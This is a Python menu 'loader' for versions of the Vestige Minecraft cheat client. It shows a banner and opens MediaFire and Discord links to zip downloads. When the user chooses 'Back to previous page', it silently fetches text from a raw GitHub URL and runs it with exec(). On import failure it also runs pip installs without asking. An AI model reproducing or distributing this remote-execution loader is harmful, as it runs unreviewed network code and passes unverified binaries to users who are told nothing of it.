import sys
import time
from time import sleep, strftime
from datetime import datetime
import threading
import webbrowser, os, re, json, random
import msvcrt
try:
    from faker import Faker
    from requests import session
    from colorama import Fore, Style
    import requests, random, re
    from random import choice, randint, shuffle
    import requests, pystyle
    from pystyle import Write, Colors
except:
    os.system("pip install faker")
    os.system("pip install requests")
    os.system("pip install colorama")
    os.system('pip install requests && pip install bs4 && pip install pystyle && pip install pycryptodome')
from pystyle import Add, Center, Anime, Colors, Colorate, Write, System
xnhac = "\033[1;36m"
do = "\033[1;31m"
luc = "\033[1;32m"
vang = "\033[1;33m"
xduong = "\033[1;34m"
hong = "\033[1;35m"
trang = "\033[1;39m"
whiteb = "\033[1;39m"
red = "\033[0;31m"
redb = "\033[1;31m"
end = '\033[0m'
ves = """\033[1;32m
\033[1;39m                                   (Loader author : VuDungVapeV4#5887 x Lev#1268)

                              ██╗░░░██╗███████╗░██████╗████████╗██╗░██████╗░███████╗
                              ██║░░░██║██╔════╝██╔════╝╚══██╔══╝██║██╔════╝░██╔════╝
                              ╚██╗░██╔╝█████╗░░╚█████╗░░░░██║░░░██║██║░░██╗░█████╗░░
                              ░╚████╔╝░██╔══╝░░░╚═══██╗░░░██║░░░██║██║░░╚██╗██╔══╝░░
                              ░░╚██╔╝░░███████╗██████╔╝░░░██║░░░██║╚██████╔╝███████╗
                              ░░░╚═╝░░░╚══════╝╚═════╝░░░░╚═╝░░░╚═╝░╚═════╝░╚══════╝
\033[1;39m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
\033[1;39m ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
       \033[1;39m┌─────────────────────────────────────────── Archive ────────────────────────────────────────────┐            
       \033[1;32m║                           \033[1;39m  Version          : \033[1;30m 1.0.0                                          \033[1;32m║
       \033[1;32m║                           \033[1;39m  Discord          : \033[1;34m discord.gg/sBKFTxVpxa                          \033[1;32m║
       \033[1;32m║                           \033[1;39m  Source           : \033[1;33m github.com/MCCFree/MCC-Loader/new/main         \033[1;32m║
       \033[1;32m║                           \033[1;39m  Loader Plan      : \033[1;32m Free                                           \033[1;32m║
       \033[1;39m└────────────────────────────────────────────────────────────────────────────────────────────────┘
 \033[0;31m                               Create a ticket if u found a client that not working.
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
                                            \033[1;39m┌─────────────────────┐         
                                            \033[1;32m║    \033[1;39m   Vestige       \033[1;32m║          
                                            \033[1;39m└─────────────────────┘          
\033[1;31m[\033[1;39m-\033[1;31m] \033[1;32mBack to previous page 
\033[1;31m[\033[1;39m2.0.2\033[1;31m] \033[1;32mVestige \033[1;31m[\033[1;33mv2.0.2\033[1;31m] 
\033[1;31m[\033[1;39m2.2.1\033[1;31m] \033[1;32mVestige \033[1;31m[\033[1;33mv2.2.1 Patched\033[1;31m] 
\033[1;31m[\033[1;39m3.0.?\033[1;31m] \033[1;32mVestige \033[1;31m[\033[1;33mv3.0.?\033[1;31m] 
\033[1;31m[\033[1;39mVR\033[1;31m] \033[1;32mVestige Reborn \033[1;31m[\033[1;33mv1.2.1\033[1;31m]
\033[1;97m= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
"""
print(ves)


# =======================[RUN]=======================#
while True:
  os.system('cls')
  print(ves)
  chon = input('                                               \033[1;39m[\033[1;31m×\033[1;39m] \033[1;39m>> ')
  if chon == '-':
      os.system('cls')
      print("Leaving Vestige")
      exec(requests.get('https://raw.githubusercontent.com/MCCFree/MCC-Loader/main/Minecraft').text)
  if chon == '2.0.2':
      webbrowser.open_new("https://www.mediafire.com/file/adqea2u9ass33ni/Vestige_2.0.2.zip/file")
  if chon == '2.2.1':
      webbrowser.open_new("https://www.mediafire.com/file/puxs5k0hlvxmh6y/Vestige.zip/file")
  if chon == '3.0.?':
      webbrowser.open_new("https://www.mediafire.com/file/puxs5k0hlvxmh6y/Vestige.zip/file")
  if chon == 'VR':
      webbrowser.open_new("https://cdn.discordapp.com/attachments/1163049995520458782/1182982091579863060/VestigeR.zip?ex=6586aced&is=657437ed&hm=2a19efec25e72980b403e21c418e548e79e7feac7d0bcca35206ee8abf3ae7f6&")
  else:
      continue
